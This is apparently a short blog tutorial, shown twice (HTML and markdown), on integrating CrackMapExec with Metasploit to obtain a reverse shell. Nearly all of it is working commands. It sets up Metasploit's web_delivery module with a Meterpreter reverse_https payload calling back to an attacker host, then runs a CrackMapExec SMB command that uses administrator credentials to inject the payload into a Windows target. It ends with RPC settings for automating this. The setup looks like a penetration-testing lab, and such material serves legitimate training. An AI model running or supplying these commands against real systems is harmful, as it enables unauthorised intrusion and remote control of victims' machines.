<p>Today I will explain how to integrate CrackMapExec 5.4.0 with Metasploit and get a reverse shell in the lame way.</p>
<p>First, we need to start the msfconsole and select the exploit web_delivery since we using a web server to deliver our code we need an HTTPS reverse shell as payload.</p>
<h2 id="heading-msf-exploit">MSF Exploit</h2>
<pre><code class="lang-bash">use exploit/multi/script/web_delivery
<span class="hljs-built_in">set</span> SRVHOST 192.168.1.201
<span class="hljs-built_in">set</span> SRVPORT 8443
<span class="hljs-built_in">set</span> exitonsession <span class="hljs-literal">false</span>
<span class="hljs-built_in">set</span> SSL <span class="hljs-literal">true</span>
</code></pre>
<h2 id="heading-select-payload">Select Payload</h2>
<pre><code class="lang-bash"><span class="hljs-built_in">set</span> payload windows/meterpreter/reverse_https
<span class="hljs-built_in">set</span> LHOST 192.168.1.201
<span class="hljs-built_in">set</span> LPORT 443
<span class="hljs-built_in">set</span> LURI rfs
</code></pre>
<h2 id="heading-select-the-type-of-target">Select the Type of Target</h2>
<p>Here we have multiple options, we select target 2 which is used for Powershell</p>
<pre><code class="lang-bash"><span class="hljs-built_in">set</span> target 2
</code></pre>
<pre><code class="lang-bash">exploit -j
</code></pre>
<h2 id="heading-crackmapexec-with-metasploit">CrackMapExec with Metasploit</h2>
<pre><code class="lang-bash">crackmapexec smb 192.168.1.119 -u <span class="hljs-string">'Administrator'</span> -p <span class="hljs-string">'Password!'</span> 
-d dc.deathstar.rfs 
-M met_inject -o SRVHOST=192.168.1.201 SRVPORT=9443 RAND=J3PR0Jn6smfPvr SSL=https
</code></pre>
<p><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fr6sr4IFbONbbv0banxcV%2Fuploads%2FsnkuMk3dXfvPiwjo1g4f%2Fimage.png?alt=media&amp;token=81acdb59-4b73-4e9b-ab67-e0aebe470209" alt /></p>
<h2 id="heading-automation-with-rpc">Automation with RPC</h2>
<pre><code class="lang-bash">vi ~/.cme/cme.conf
</code></pre>
<pre><code class="lang-bash">[Metasploit]
rpc_host=127.0.0.1
rpc_port=55552
password=abc123
</code></pre>
<p><a target="_blank" href="https://crackmapexec.popdocs.net/">https://crackmapexec.popdocs.net/</a></p>


Today I will explain how to integrate CrackMapExec 5.4.0 with Metasploit and get a reverse shell in the lame way.

First, we need to start the msfconsole and select the exploit web\_delivery since we using a web server to deliver our code we need an HTTPS reverse shell as payload.

## MSF Exploit

```bash
use exploit/multi/script/web_delivery
set SRVHOST 192.168.1.201
set SRVPORT 8443
set exitonsession false
set SSL true
```

## Select Payload

```bash
set payload windows/meterpreter/reverse_https
set LHOST 192.168.1.201
set LPORT 443
set LURI rfs
```

## Select the Type of Target

Here we have multiple options, we select target 2 which is used for Powershell

```bash
set target 2
```

```bash
exploit -j
```

## CrackMapExec with Metasploit

```bash
crackmapexec smb 192.168.1.119 -u 'Administrator' -p 'Password!' 
-d dc.deathstar.rfs 
-M met_inject -o SRVHOST=192.168.1.201 SRVPORT=9443 RAND=J3PR0Jn6smfPvr SSL=https
```

![](https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fr6sr4IFbONbbv0banxcV%2Fuploads%2FsnkuMk3dXfvPiwjo1g4f%2Fimage.png?alt=media&token=81acdb59-4b73-4e9b-ab67-e0aebe470209 align="left")

## Automation with RPC

```bash
vi ~/.cme/cme.conf
```

```bash
[Metasploit]
rpc_host=127.0.0.1
rpc_port=55552
password=abc123
```

[https://crackmapexec.popdocs.net/](https://crackmapexec.popdocs.net/)

Getting Reverse Shells with Metasploit and CrackMapExec

CME Reverse Shell with Metasploit

MSF Exploit

RFS Blog

RFS Blog

CME Reverse Shell with Metasploit

Getting Reverse Shells with Metasploit and CrackMapExec

Table of contents

MSF Exploit

Select Payload

Select the Type of Target

CrackMapExec with Metasploit

Automation with RPC